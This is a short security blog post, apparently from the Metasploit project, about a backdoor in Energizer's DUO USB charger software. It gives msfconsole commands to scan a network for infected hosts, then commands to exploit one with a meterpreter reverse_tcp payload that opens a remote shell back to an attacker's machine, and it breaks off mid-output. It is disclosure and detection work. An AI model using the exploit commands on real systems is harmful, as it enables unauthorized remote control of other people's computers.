Locate and Exploit the Energizer Trojan

The newsophere was abuzz this morning with the discovery that Energizer's "DUO" USB Battery Charger included a malicious backdoor in the accompanying software. This backdoor was only discovered after the product was discontinued, leading some to believe that it went through its entire lifecycle undetected. The good news is that the backdoor is relatively harmless; machines behind the corporate firewall, or those with a local firewall installed, should prevent access to the listener on port 7777. The backdoor makes no outbound connections and uninstalling the USB Charger software package clears the system.As of this afternoon, you can now use Metasploit to locate infected systems on the local network. After downloading a copy of Metasploit and updating it to revision 8749 or newer, the following commands can be used to scan the local network:$ msfconsolemsf > use auxiliary/scanner/backdoor/energizer_duo_detectmsf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24msf auxiliary(energizer_duo_detect) > set THREADS 256msf auxiliary(energizer_duo_detect) > run 192.168.0.132:7777 FOUND: ...To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:msf > use exploit/windows/backdoor/energizer_duo_payloadmsf exploit(energizer_duo_payload) > set RHOST 192.168.0.132msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(energizer_duo_payload) > set LHOST 192.168.0.228msf exploit(energizer_duo_payload) > exploit Started reverse handler on 192.168.0.228:4444 Trying (continue reading...)